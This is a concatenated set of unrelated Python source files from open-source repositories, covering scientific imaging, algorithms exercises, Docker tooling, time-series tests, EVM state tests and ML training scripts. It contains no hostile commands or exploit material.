hot channel. They can be decoded with :py:class:`.PerRoundMaxChannel` by setting
``trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH`` or
``trace_building_strategy=TraceBuildingStrategies.NEAREST_NEIGHBORS``. The example below
demonstrates the recommended method for decoding one hot multiplexed
data using :py:class:`.PerRoundMaxChannel`.
"""
# Load in situ sequencing experiment and find spots
from starfish.image import ApplyTransform, LearnTransform, Filter
from starfish.types import Axes, TraceBuildingStrategies
from starfish import data, FieldOfView
from starfish.spots import FindSpots
experiment = data.ISS()
fov = experiment.fov()
imgs = fov.get_image(FieldOfView.PRIMARY_IMAGES) # primary images
dots = fov.get_image("dots") # reference round for image registration
# filter raw data
masking_radius = 15
filt = Filter.WhiteTophat(masking_radius, is_volume=False)
filt.run(imgs, in_place=True)
filt.run(dots, in_place=True)
# register primary images to reference round
learn_translation = LearnTransform.Translation(reference_stack=dots, axes=Axes.ROUND, upsampling=1000)
transforms_list = learn_translation.run(imgs.reduce({Axes.CH, Axes.ZPLANE}, func="max"))
warp = ApplyTransform.Warp()
warp.run(imgs, transforms_list=transforms_list, in_place=True)
# run blob detector on dots (reference image with every spot)
bd = FindSpots.BlobDetector(
min_sigma=1,
max_sigma=10,
num_sigma=30,
threshold=0.01,
measurement_type='mean',
)
dots_max = dots.reduce((Axes.ROUND, Axes.ZPLANE), func="max")
spots = bd.run(image_stack=imgs, reference_image=dots_max)
# Decode spots with PerRoundMaxChannel
from starfish.spots import DecodeSpots
decoder = DecodeSpots.PerRoundMaxChannel(
codebook=experiment.codebook,
trace_building_strategy=TraceBuildingStrategies.EXACT_MATCH
)
decoded_intensities = decoder.run(spots=spots) |
Python/sum_prime.py | kennethsequeira/Hello-world | 1,428 | 46652 | <reponame>kennethsequeira/Hello-world<filename>Python/sum_prime.py<gh_stars>1000+
'''
Write a function sumprimes(l) that takes as input a list of integers l and retuns the sum of all the prime numbers in l.
Here are some examples to show how your function should work.
>>> sumprimes([3,3,1,13])
19
'''
def sumprimes(l):
prime_sum = int()
for num in l:
if is_prime(num):
prime_sum = prime_sum + num
return prime_sum
def is_prime(n):
factor_list = []
for num in range(2, n+1):
if n % num == 0:
factor_list = factor_list + [num]
return len(factor_list) == 1 |
Algorithms/Merge Sort/LinkedListMergeSort.py | TeacherManoj0131/HacktoberFest2020-Contributions | 256 | 46675 | #Program for merge sort in linked list
class Node:
def __init__(self, data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def append(self, new_value):
new_node = Node(new_value)
if self.head is None:
self.head = new_node
return
curr_node = self.head
while curr_node.next is not None:
curr_node = curr_node.next
curr_node.next = new_node
def sortedMerge(self, a, b):
result = None
# Base cases
if a == None:
return b
if b == None:
return a
if a.data <= b.data:
result = a
result.next = self.sortedMerge(a.next, b)
else:
result = b
result.next = self.sortedMerge(a, b.next)
return result
#function for merge sort
def mergeSort(self, h):
if h == None or h.next == None:
return h
# get the middle of the list
middle = self.getMiddle(h)
nexttomiddle = middle.next
# set the next of middle node to None
middle.next = None
# Apply mergeSort on left list
left = self.mergeSort(h)
# Apply mergeSort on right list
right = self.mergeSort(nexttomiddle)
# Merge the left and right lists
sortedlist = self.sortedMerge(left, right)
return sortedlist
#get middle element from the linked list
def getMiddle(self, head):
if (head == None):
return head
slow = head
fast = head
while (fast.next != None and
fast.next.next != None):
slow = slow.next
fast = fast.next.next
return slow
def printList(head):
if head is None:
print(' ')
return
curr_node = head
while curr_node:
print(curr_node.data, end = " ")
curr_node = curr_node.next
print(' ')
# Main Code
if __name__ == '__main__':
li = LinkedList()
li.append(67)
li.append(98)
li.append(45)
li.append(12)
li.append(43)
li.append(17)
# Apply merge Sort
li.head = li.mergeSort(li.head)
print ("Sorted Linked List is:")
printList(li.head)
|
dusty/systems/docker/testing_image.py | gamechanger/dusty | 421 | 46684 | <filename>dusty/systems/docker/testing_image.py<gh_stars>100-1000
from __future__ import absolute_import
import docker
from ...compiler.compose import container_code_path, get_volume_mounts
from ...compiler.spec_assembler import get_expanded_libs_specs
from ...log import log_to_client
from ...command_file import dusty_command_file_name, lib_install_commands_for_app_or_lib
from .common import spec_for_service
from . import get_docker_client
from ... import constants
class ImageCreationError(Exception):
def __init__(self, code):
self.code = code
message = 'Run exited with code {}'.format(code)
super(ImageCreationError, self).__init__(message)
def _ensure_base_image(app_or_lib_name):
testing_spec = _testing_spec(app_or_lib_name)
log_to_client('Getting the base image for the new image')
docker_client = get_docker_client()
if 'image' in testing_spec:
_ensure_image_pulled(testing_spec['image'])
return testing_spec['image']
elif 'build' in testing_spec:
image_tag = 'dusty_testing_base/image'
log_to_client('Need to build the base image based off of the Dockerfile here: {}'.format(testing_spec['build']))
try:
docker_client.remove_image(image=image_tag)
except:
log_to_client('Not able to remove image {}'.format(image_tag))
docker_client.build(path=testing_spec['build'], tag=image_tag)
return image_tag
def _ensure_image_pulled(image_name):
docker_client = get_docker_client()
full_image_name = image_name
if ':' not in image_name:
full_image_name = '{}:latest'.format(image_name)
for image in docker_client.images():
if full_image_name in image['RepoTags']:
break
else:
split = image_name.split(':')
repo, tag = split[0], 'latest' if len(split) == 1 else split[1]
docker_client.pull(repo, tag, insecure_registry=True)
def _get_split_volumes(volumes):
print volumes
split_volumes = []
for volume in volumes:
volume_list = volume.split(':')
split_volumes.append({'host_location': volume_list[0],
'container_location': volume_list[1]})
return split_volumes
def _get_create_container_volumes(split_volumes):
return [volume_dict['container_location'] for volume_dict in split_volumes]
def _get_create_container_binds(split_volumes):
binds_dict = {}
for volume_dict in split_volumes:
binds_dict[volume_dict['host_location']] = {'bind': volume_dict['container_location'], 'ro': False}
return binds_dict
def _create_tagged_image(base_image_tag, new_image_tag, app_or_lib_name):
docker_client = get_docker_client()
command = _get_test_image_setup_command(app_or_lib_name)
split_volumes = _get_split_volumes(get_volume_mounts(app_or_lib_name, get_expanded_libs_specs(), test=True))
create_container_volumes = _get_create_container_volumes(split_volumes)
create_container_binds = _get_create_container_binds(split_volumes)
container = docker_client.create_container(image=base_image_tag,
command=command,
volumes=create_container_volumes,
host_config=docker.utils.create_host_config(binds=create_container_binds))
docker_client.start(container=container['Id'])
log_to_client('Running commands to create new image:')
for line in docker_client.logs(container['Id'], stdout=True, stderr=True, stream=True):
log_to_client(line.strip())
exit_code = docker_client.wait(container['Id'])
if exit_code:
raise ImageCreationError(exit_code)
new_image = docker_client.commit(container=container['Id'])
try:
docker_client.remove_image(image=new_image_tag)
except:
log_to_client('Not able to remove image {}'.format(new_image_tag))
docker_client.tag(image=new_image['Id'], repository=new_image_tag, force=True)
docker_client.remove_container(container=container['Id'], v=True)
def _testing_spec(app_or_lib_name):
expanded_specs = get_expanded_libs_specs()
return spec_for_service(app_or_lib_name, expanded_specs)['test']
def test_image_name(app_or_lib_name):
return "dusty/test_{}".format(app_or_lib_name)
def _get_test_image_setup_command(app_or_lib_name):
return 'sh {}/{}'.format(constants.CONTAINER_COMMAND_FILES_DIR, dusty_command_file_name(app_or_lib_name))
def test_image_exists(app_or_lib_name):
image_name = test_image_name(app_or_lib_name)
docker_client = get_docker_client()
images = docker_client.images()
for image in images:
# Need to be careful, RepoTags can be explicitly set to None
repo_tags = image.get('RepoTags') or []
if image_name in repo_tags or '{}:latest'.format(image_name) in repo_tags:
return True
return False
def create_test_image(app_or_lib_name):
"""
Create a new test image by applying changes to the base image specified
in the app or lib spec
"""
log_to_client('Creating the testing image')
base_image_tag = _ensure_base_image(app_or_lib_name)
new_image_name = test_image_name(app_or_lib_name)
_create_tagged_image(base_image_tag, new_image_name, app_or_lib_name)
def update_test_image(app_or_lib_name):
"""
Apply updates to an existing testing image that has already been created
by Dusty - updating this test image should be quicker than creating a new
test image from the base image in the spec
"""
log_to_client('Updating the testing image')
if not test_image_exists(app_or_lib_name):
create_test_image(app_or_lib_name)
return
test_image_tag = test_image_name(app_or_lib_name)
_create_tagged_image(test_image_tag, test_image_tag, app_or_lib_name)
|
examples/dir.py | dmytrostriletskyi/design-kit | 107 | 46696 | <gh_stars>100-1000
from accessify import accessify, private
@accessify
class Car:
@private
def start_engine(self):
return 'Engine sound.'
if __name__ == '__main__':
car = Car()
assert 'start_engine' not in dir(car)
|
docs/examples/container/rancher/search_containers.py | dupontz/libcloud | 1,435 | 46701 | <reponame>dupontz/libcloud<gh_stars>1000+
from libcloud.container.types import Provider
from libcloud.container.providers import get_driver
driver = get_driver(Provider.RANCHER)
connection = driver("MYRANCHERACCESSKEY", "MYRANCHERSECRETKEY",
host="172.30.22.1", port=8080, secure=False)
search_results = connection.ex_search_containers(
search_params={"imageUuid": "docker:mysql", "state": "running"})
id_of_first_result = search_results[0]['id']
|
tests/test_analysis/test_plotters.py | martins0n/etna | 326 | 46724 | import numpy as np
import pandas as pd
import pytest
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import TheilSenRegressor
from etna.analysis import get_residuals
from etna.analysis import plot_residuals
from etna.analysis import plot_trend
from etna.analysis.plotters import _get_labels_names
from etna.datasets import TSDataset
from etna.metrics import MAE
from etna.models import LinearPerSegmentModel
from etna.pipeline import Pipeline
from etna.transforms import BinsegTrendTransform
from etna.transforms import LagTransform
from etna.transforms import LinearTrendTransform
from etna.transforms import STLTransform
from etna.transforms import TheilSenTrendTransform
@pytest.fixture
def residuals():
timestamp = pd.date_range("2020-01-01", periods=100, freq="D")
df = pd.DataFrame(
{
"timestamp": timestamp.tolist() * 2,
"segment": ["segment_0"] * len(timestamp) + ["segment_1"] * len(timestamp),
"target": np.arange(len(timestamp)).tolist() + (np.arange(len(timestamp)) + 1).tolist(),
}
)
df_wide = TSDataset.to_dataset(df)
ts = TSDataset(df=df_wide, freq="D")
forecast_df = ts[timestamp[10:], :, :]
forecast_df.loc[:, pd.IndexSlice["segment_0", "target"]] = -1
forecast_df.loc[:, pd.IndexSlice["segment_1", "target"]] = 1
residuals_df = ts[timestamp[10:], :, :]
residuals_df.loc[:, pd.IndexSlice["segment_0", "target"]] += 1
residuals_df.loc[:, pd.IndexSlice["segment_1", "target"]] -= 1
return residuals_df, forecast_df, ts
def test_get_residuals(residuals):
"""Test that get_residuals finds residuals correctly."""
residuals_df, forecast_df, ts = residuals
actual_residuals = get_residuals(forecast_df=forecast_df, ts=ts)
assert actual_residuals.to_pandas().equals(residuals_df)
def test_get_residuals_not_matching_lengths(residuals):
"""Test that get_residuals fails to find residuals correctly if ts hasn't answers."""
residuals_df, forecast_df, ts = residuals
ts = TSDataset(df=ts[ts.index[:-10], :, :], freq="D")
with pytest.raises(KeyError):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_get_residuals_not_matching_segments(residuals):
"""Test that get_residuals fails to find residuals correctly if segments of dataset and forecast differ."""
residuals_df, forecast_df, ts = residuals
columns_frame = forecast_df.columns.to_frame()
columns_frame["segment"] = ["segment_0", "segment_3"]
forecast_df.columns = pd.MultiIndex.from_frame(columns_frame)
with pytest.raises(KeyError, match="Segments of `ts` and `forecast_df` should be the same"):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_plot_residuals_fails_unkown_feature(example_tsdf):
"""Test that plot_residuals fails if meet unknown feature."""
pipeline = Pipeline(
model=LinearPerSegmentModel(), transforms=[LagTransform(in_column="target", lags=[5, 6, 7])], horizon=5
)
metrics, forecast_df, info = pipeline.backtest(ts=example_tsdf, metrics=[MAE()], n_folds=3)
with pytest.raises(ValueError, match="Given feature isn't present in the dataset"):
plot_residuals(forecast_df=forecast_df, ts=example_tsdf, feature="unkown_feature")
@pytest.mark.parametrize(
"poly_degree, trend_transform_class",
(
[1, LinearTrendTransform],
[2, LinearTrendTransform],
[1, TheilSenTrendTransform],
[2, TheilSenTrendTransform],
),
)
def test_plot_trend(poly_degree, example_tsdf, trend_transform_class):
plot_trend(ts=example_tsdf, trend_transform=trend_transform_class(in_column="target", poly_degree=poly_degree))
@pytest.mark.parametrize("detrend_model", (TheilSenRegressor(), LinearRegression()))
def test_plot_bin_seg(example_tsdf, detrend_model):
plot_trend(ts=example_tsdf, trend_transform=BinsegTrendTransform(in_column="target", detrend_model=detrend_model))
@pytest.mark.parametrize("period", (7, 30))
def test_plot_stl(example_tsdf, period):
plot_trend(ts=example_tsdf, trend_transform=STLTransform(in_column="target", period=period))
@pytest.mark.parametrize(
"poly_degree, expect_values, trend_class",
(
[1, True, LinearTrendTransform],
[2, False, LinearTrendTransform],
[1, True, TheilSenTrendTransform],
[2, False, TheilSenTrendTransform],
),
)
def test_get_labels_names_linear_coeffs(example_tsdf, poly_degree, expect_values, trend_class):
ln_tr = trend_class(in_column="target", poly_degree=poly_degree)
example_tsdf.fit_transform([ln_tr])
segments = example_tsdf.segments
_, linear_coeffs = _get_labels_names([ln_tr], segments)
if expect_values:
assert list(linear_coeffs.values()) != ["", ""]
else:
assert list(linear_coeffs.values()) == ["", ""]
|
var/spack/repos/builtin/packages/py-flit-core/package.py | zygyz/spack | 348 | 46740 | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import glob
import os
import zipfile
from spack import *
class PyFlitCore(PythonPackage):
"""Distribution-building parts of Flit."""
homepage = "https://github.com/takluyver/flit"
url = "https://github.com/takluyver/flit/archive/refs/tags/3.3.0.tar.gz"
maintainers = ['takluyver']
version('3.3.0', sha256='f5340b268563dd408bf8e2df6dbc8d4d08bc76cdff0d8c7f8a4be94e5f01f22f')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-toml', type=('build', 'run'))
def build(self, spec, prefix):
with working_dir('flit_core'):
python('build_dists.py')
def install(self, spec, prefix):
wheel = glob.glob(os.path.join('flit_core', 'dist', '*.whl'))[0]
with zipfile.ZipFile(wheel) as f:
f.extractall(python_purelib)
|
examples/null_support/client.py | amrhgh/django-grpc-framework | 269 | 46745 | <gh_stars>100-1000
import grpc
import snippets_pb2
import snippets_pb2_grpc
from google.protobuf.struct_pb2 import NullValue
with grpc.insecure_channel('localhost:50051') as channel:
stub = snippets_pb2_grpc.SnippetControllerStub(channel)
request = snippets_pb2.Snippet(id=1, title='snippet title')
# send non-null value
# request.language.value = "python"
# send null value
request.language.null = NullValue.NULL_VALUE
response = stub.Update(request)
print(response, end='')
|
ddtrace/contrib/vertica/constants.py | melancholy/dd-trace-py | 308 | 46747 | # Service info
APP = "vertica"
|
quarkchain/evm/tests/new_statetest_utils.py | QuarkChain/pyquarkchain | 237 | 46755 | <reponame>QuarkChain/pyquarkchain
import sys
from quarkchain.evm.state import State
from quarkchain.evm.common import FakeHeader
from quarkchain.evm.utils import (
decode_hex,
parse_int_or_hex,
sha3,
to_string,
remove_0x_head,
encode_hex,
big_endian_to_int,
)
from quarkchain.evm.config import default_config, Env
from quarkchain.config import get_default_evm_config
from quarkchain.evm.exceptions import InvalidTransaction
import quarkchain.evm.transactions as transactions
from quarkchain.evm.messages import apply_transaction
from quarkchain.evm.specials import specials, configure_special_contract_ts
import copy
import os
from quarkchain.db import InMemoryDb
from quarkchain.utils import token_id_encode
config_string = ":info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug"
konfig = copy.copy(default_config)
# configure_logging(config_string=config_string)
fixture_path = os.path.join(os.path.dirname(__file__), "../..", "fixtures")
fake_headers = {}
def mk_fake_header(blknum):
if blknum not in fake_headers:
fake_headers[blknum] = FakeHeader(sha3(to_string(blknum)))
return fake_headers[blknum]
basic_env = {
"currentCoinbase": "0x2adc25665018aa1fe0e6bc666dac8fc2697ff9ba",
"currentDifficulty": "0x020000",
"currentGasLimit": "0x7fffffffffffffff",
"currentNumber": "0x01",
"currentTimestamp": "0x03e8",
"previousHash": "0x5e20a0453cecd065ea59c37ac63e079ee08998b6045136a8ce6635c7912ec0b6",
}
evm_config = get_default_evm_config()
network_to_test = {"ConstantinopleFix"}
# Makes a diff between a prev and post state
def mk_state_diff(prev, post):
o = {}
for k in prev.keys():
if k not in post:
o[k] = ["-", prev[k]]
for k in post.keys():
if k not in prev:
o[k] = ["+", post[k]]
elif prev[k] != post[k]:
ok = {}
for key in ("nonce", "token_balances", "code"):
if prev[k][key] != post[k][key]:
ok[key] = [prev[k][key], "->", post[k][key]]
if prev[k]["storage"] != post[k]["storage"]:
ok["storage"] = {}
for sk in prev[k]["storage"].keys():
if sk not in post[k]["storage"]:
ok["storage"][sk] = ["-", prev[k]["storage"][sk]]
for sk in post[k]["storage"].keys():
if sk not in prev[k]["storage"]:
ok["storage"][sk] = ["+", post[k]["storage"][sk]]
else:
ok["storage"][sk] = [
prev[k]["storage"][sk],
"->",
post[k]["storage"][sk],
]
o[k] = ok
return o
# Compute a single unit of a state test
def compute_state_test_unit(state, txdata, indices, konfig, is_qkc_state, qkc_env=None):
state.env.config = konfig
s = state.snapshot()
if "transferTokenId" in txdata:
transfer_token_id = parse_int_or_hex(
txdata["transferTokenId"][indices["transferTokenId"]]
)
else:
transfer_token_id = token_id_encode("QKC")
try:
# Create the transaction
tx = transactions.Transaction(
nonce=parse_int_or_hex(txdata["nonce"] or b"0"),
gasprice=parse_int_or_hex(txdata["gasPrice"] or b"0"),
startgas=parse_int_or_hex(txdata["gasLimit"][indices["gas"]] or b"0"),
to=decode_hex(remove_0x_head(txdata["to"])),
value=parse_int_or_hex(txdata["value"][indices["value"]] or b"0"),
data=decode_hex(remove_0x_head(txdata["data"][indices["data"]])),
gas_token_id=token_id_encode("QKC"),
transfer_token_id=transfer_token_id,
# Should not set testing flag if testing QuarkChain state
is_testing=not is_qkc_state,
)
tx.set_quark_chain_config(qkc_env.quark_chain_config)
if "secretKey" in txdata:
tx.sign(decode_hex(remove_0x_head(txdata["secretKey"])))
else:
tx._in_mutable_context = True
tx.v = parse_int_or_hex(txdata["v"])
tx._in_mutable_context = False
# Run it
prev = copy.deepcopy(state.to_dict())
success, output = apply_transaction(state, tx, tx_wrapper_hash=bytes(32))
except InvalidTransaction as e:
print("Exception: %r" % e)
success, output = False, b""
# touch coinbase, make behavior consistent with go-ethereum
state.delta_token_balance(state.block_coinbase, token_id_encode("QKC"), 0)
state.commit()
post = state.to_dict()
output_decl = {
"hash": "0x" + encode_hex(state.trie.root_hash),
"indexes": indices,
"diff": mk_state_diff(prev, post),
}
state.revert(s)
return output_decl
# Initialize the state for state tests
def init_state(env, pre, is_qkc_state, qkc_env=None):
# Setup env
db = InMemoryDb()
state_env = Env(config=konfig)
state_env.db = db
state = State(
env=state_env,
block_prevhash=decode_hex(remove_0x_head(env["previousHash"])),
prev_headers=[
mk_fake_header(i)
for i in range(
parse_int_or_hex(env["currentNumber"]) - 1,
max(-1, parse_int_or_hex(env["currentNumber"]) - 257),
-1,
)
],
block_number=parse_int_or_hex(env["currentNumber"]),
block_coinbase=decode_hex(remove_0x_head(env["currentCoinbase"])),
block_difficulty=parse_int_or_hex(env["currentDifficulty"]),
gas_limit=parse_int_or_hex(env["currentGasLimit"]),
timestamp=parse_int_or_hex(env["currentTimestamp"]),
qkc_config=qkc_env.quark_chain_config,
# If testing QuarkChain states, should not use mock account
use_mock_evm_account=not is_qkc_state,
)
if "overrides" in env:
if "specialContractTimestamp" in env["overrides"]:
for overrides in env["overrides"]["specialContractTimestamp"]:
configure_special_contract_ts(
specials,
bytes.fromhex(overrides["address"]),
overrides["timestamp"],
)
seen_token_ids = set()
# Fill up pre
for address, h in list(pre.items()):
assert len(address) in (40, 42)
address = decode_hex(remove_0x_head(address))
state.set_nonce(address, parse_int_or_hex(h["nonce"]))
if is_qkc_state and "balances" in h:
# In QuarkChain state tests, can either specify balance map or single balance
for token_id, balance in h["balances"].items():
parsed_token_id = parse_int_or_hex(token_id)
state.set_token_balance(
address, parsed_token_id, parse_int_or_hex(balance)
)
seen_token_ids.add(parsed_token_id)
else:
state.set_balance(address, parse_int_or_hex(h["balance"]))
state.set_code(address, decode_hex(remove_0x_head(h["code"])))
for k, v in h["storage"].items():
state.set_storage_data(
address,
big_endian_to_int(decode_hex(k[2:])),
big_endian_to_int(decode_hex(v[2:])),
)
# Update allowed token IDs
if seen_token_ids:
state.qkc_config._allowed_token_ids = seen_token_ids
state.commit(allow_empties=True)
return state
class EnvNotFoundException(Exception):
pass
def verify_state_test(test):
print("Verifying state test")
if "env" not in test:
raise EnvNotFoundException("Env not found")
_state = init_state(test["env"], test["pre"], test["qkcstate"], qkc_env=test["qkc"])
for config_name, results in test["post"].items():
# Old protocol versions may not be supported
if config_name not in network_to_test:
continue
print("Testing for %s" % config_name)
for result in results:
data = test["transaction"]["data"][result["indexes"]["data"]]
if len(data) > 2000:
data = "data<%d>" % (len(data) // 2 - 1)
print(
"Checking for values: g %d v %d d %s (indexes g %d v %d d %d)"
% (
parse_int_or_hex(
test["transaction"]["gasLimit"][result["indexes"]["gas"]]
),
parse_int_or_hex(
test["transaction"]["value"][result["indexes"]["value"]]
),
data,
result["indexes"]["gas"],
result["indexes"]["value"],
result["indexes"]["data"],
)
)
computed = compute_state_test_unit(
_state,
test["transaction"],
result["indexes"],
evm_config,
test["qkcstate"],
qkc_env=test["qkc"],
)
if computed["hash"][-64:] != result["hash"][-64:]:
for k in computed["diff"]:
print(k, computed["diff"][k], file=sys.stderr)
print(test["filename"], test["testname"], file=sys.stderr)
raise Exception(
"Hash mismatch, computed: %s, supplied: %s"
% (computed["hash"], result["hash"])
)
else:
for k in computed["diff"]:
print(k, computed["diff"][k])
print("Hash matched!: %s" % computed["hash"])
return True
|
spotpy/database/sql.py | cheginit/spotpy | 182 | 46843 | <filename>spotpy/database/sql.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import sqlite3
import sys
from .base import database
if sys.version_info[0] >= 3:
unicode = str
class PickalableSWIG:
def __setstate__(self, state):
self.__init__(*state['args'])
def __getstate__(self):
return {'args': self.args}
class PickalableSQL3Connect(sqlite3.Connection, PickalableSWIG):
def __init__(self, *args,**kwargs):
self.args = args
sqlite3.Connection.__init__(self,*args,**kwargs)
class PickalableSQL3Cursor(sqlite3.Cursor, PickalableSWIG):
def __init__(self, *args,**kwargs):
self.args = args
sqlite3.Cursor.__init__(self,*args,**kwargs)
class sql(database):
"""
This class saves the process in the working storage. It can be used if
safety matters.
"""
def __init__(self, *args, **kwargs):
import os
# init base class
super(sql, self).__init__(*args, **kwargs)
# Create a open file, which needs to be closed after the sampling
try:
os.remove(self.dbname + '.db')
except:
pass
self.db = PickalableSQL3Connect(self.dbname + '.db')
self.db_cursor = PickalableSQL3Cursor(self.db)
# Create Table
# self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS '''+self.dbname+'''
# (like1 real, parx real, pary real, simulation1 real, chain int)''')
self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS ''' + self.dbname + '''
(''' + ' real ,'.join(self.header) + ''')''')
def save(self, objectivefunction, parameterlist, simulations=None, chains=1):
coll = (self.dim_dict['like'](objectivefunction) +
self.dim_dict['par'](parameterlist) +
self.dim_dict['simulation'](simulations) +
[chains])
# Apply rounding of floats
coll = map(self.db_precision, coll)
self.db_cursor.execute(
"INSERT INTO " + self.dbname + " VALUES (" + '"' + str('","'.join(map(str, coll))) + '"' + ")")
self.db.commit()
def finalize(self):
self.db.close()
def getdata(self):
self.db = PickalableSQL3Connect(self.dbname + '.db')
self.db_cursor = PickalableSQL3Cursor(self.db)
if sys.version_info[0] >= 3:
headers = [(row[1], "<f8") for row in
self.db_cursor.execute("PRAGMA table_info(" + self.dbname + ");")]
else:
# Workaround for python2
headers = [(unicode(row[1]).encode("ascii"), unicode("<f8").encode("ascii")) for row in
self.db_cursor.execute("PRAGMA table_info(" + self.dbname + ");")]
back = np.array([row for row in self.db_cursor.execute('SELECT * FROM ' + self.dbname)], dtype=headers)
self.db.close()
return back
|
nominations/migrations/0001_initial.py | ewjoachim/pythondotorg | 911 | 46844 | <gh_stars>100-1000
# Generated by Django 2.0.9 on 2019-03-18 20:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import markupfield.fields
class Migration(migrations.Migration):
initial = True
dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]
operations = [
migrations.CreateModel(
name="Election",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=100)),
("date", models.DateField()),
("nominations_open_at", models.DateTimeField(blank=True, null=True)),
("nominations_close_at", models.DateTimeField(blank=True, null=True)),
("slug", models.SlugField(blank=True, max_length=255, null=True)),
],
options={"ordering": ["-date"]},
),
migrations.CreateModel(
name="Nomination",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=1024, null=True)),
("email", models.CharField(max_length=1024, null=True)),
(
"previous_board_service",
models.CharField(max_length=1024, null=True),
),
("employer", models.CharField(max_length=1024, null=True)),
(
"other_affiliations",
models.CharField(blank=True, max_length=2048, null=True),
),
(
"nomination_statement",
markupfield.fields.MarkupField(null=True, rendered_field=True),
),
(
"nomination_statement_markup_type",
models.CharField(
choices=[
("", "--"),
("html", "HTML"),
("plain", "Plain"),
("markdown", "Markdown"),
("restructuredtext", "Restructured Text"),
],
default="markdown",
editable=False,
max_length=30,
),
),
(
"_nomination_statement_rendered",
models.TextField(editable=False, null=True),
),
("accepted", models.BooleanField(default=False)),
("approved", models.BooleanField(default=False)),
(
"election",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="nominations.Election",
),
),
(
"nominator",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="nominations_made",
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.CreateModel(
name="Nominee",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("accepted", models.BooleanField(default=False)),
("approved", models.BooleanField(default=False)),
("slug", models.SlugField(blank=True, max_length=255, null=True)),
(
"election",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="nominees",
to="nominations.Election",
),
),
(
"user",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="nominations_recieved",
to=settings.AUTH_USER_MODEL,
),
),
],
),
migrations.AddField(
model_name="nomination",
name="nominee",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="nominations",
to="nominations.Nominee",
),
),
migrations.AlterUniqueTogether(
name="nominee", unique_together={("user", "election")}
),
]
|
ch22-直方图/22.3.4.hsv_hist-绘制2D直方图.py | makelove/OpenCV-Python-Tutorial | 2,875 | 46853 | <filename>ch22-直方图/22.3.4.hsv_hist-绘制2D直方图.py
# -*-coding:utf8-*-#
__author__ = 'play4fun'
"""
create time:15-11-8 下午4:44
绘制2D直方图
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('../data/home.jpg')
# cv2.imshow("src", img)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hist = cv2.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])
plt.imshow(hist, interpolation='nearest')
plt.show()
|
WebMirror/management/rss_parser_funcs/feed_parse_extractExpandablefemaleBlogspotCom.py | fake-name/ReadableWebProxy | 193 | 46862 | def extractExpandablefemaleBlogspotCom(item):
'''
DISABLED
Parser for 'expandablefemale.blogspot.com'
'''
return None |
lav/train_bev.py | Kin-Zhang/LAV | 122 | 46869 | import tqdm
import torch
from lav.lav_privileged import LAV
from lav.utils.datasets import get_data_loader
from lav.utils.logger import Logger
def main(args):
dmd = LAV(args)
data_loader = get_data_loader('bev', args)
logger = Logger('lav_bev', args)
save_dir = logger.save_dir
torch.manual_seed(args.seed)
# logger.watch_model(dmd.uniplanner)
global_it = 0
for epoch in range(args.num_epoch):
for data in tqdm.tqdm(data_loader, desc=f'Epoch {epoch}'):
opt_info = dmd.train_bev(*data)
if global_it % args.num_per_log == 0:
logger.log_bev_info(global_it, opt_info)
global_it += 1
dmd.bev_scheduler.step()
if (epoch+1) % args.num_per_save == 0:
bev_path = f'{save_dir}/bev_{epoch+1}.th'
torch.save(dmd.state_dict('bev'), bev_path)
print (f'save to {bev_path}')
logger.save([bev_path])
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--config-path', default='config.yaml')
parser.add_argument('--device', default='cuda', choices=['cuda', 'cpu'])
# Training misc
parser.add_argument('--num-epoch', type=int, default=160)
parser.add_argument('--num-per-log', type=int, default=100, help='log per iter')
parser.add_argument('--num-per-save', type=int, default=10, help='save per epoch')
parser.add_argument('--batch-size', type=int, default=512)
parser.add_argument('--lr', type=float, default=3e-4)
parser.add_argument('--num-workers', type=int, default=16)
# Reproducibility (still not fully determinstic due to CUDA/CuDNN)
parser.add_argument('--seed', type=int, default=2021)
args = parser.parse_args()
main(args)
|
selene_sdk/targets/tests/test_genomic_features.py | msindeeva/selene | 307 | 46893 | <gh_stars>100-1000
import os
import unittest
import numpy as np
from selene_sdk.targets import GenomicFeatures
from selene_sdk.targets.genomic_features import _any_positive_rows, \
_is_positive_row, _get_feature_data
class TestGenomicFeatures(unittest.TestCase):
def setUp(self):
self.features = [
"CTCF", "eGFP-FOS", "GABP", "Pbx3", "Pol2", "TBP"
]
self.feature_index_map = {
"CTCF": 0, "eGFP-FOS": 1, "GABP": 2, "Pbx3": 3, "Pol2": 4, "TBP": 5
}
self.n_features = len(self.features)
# CTCF only, between 16110 and 16239
self.rows_example1 = \
[["1", "16110", "16190", "CTCF"], # len 70
["1", "16128", "16158", "CTCF"], # len 30
["1", "16149", "16239", "CTCF"]] # len 90
# CTCF only, between 91128 and 91358
self.rows_example2 = \
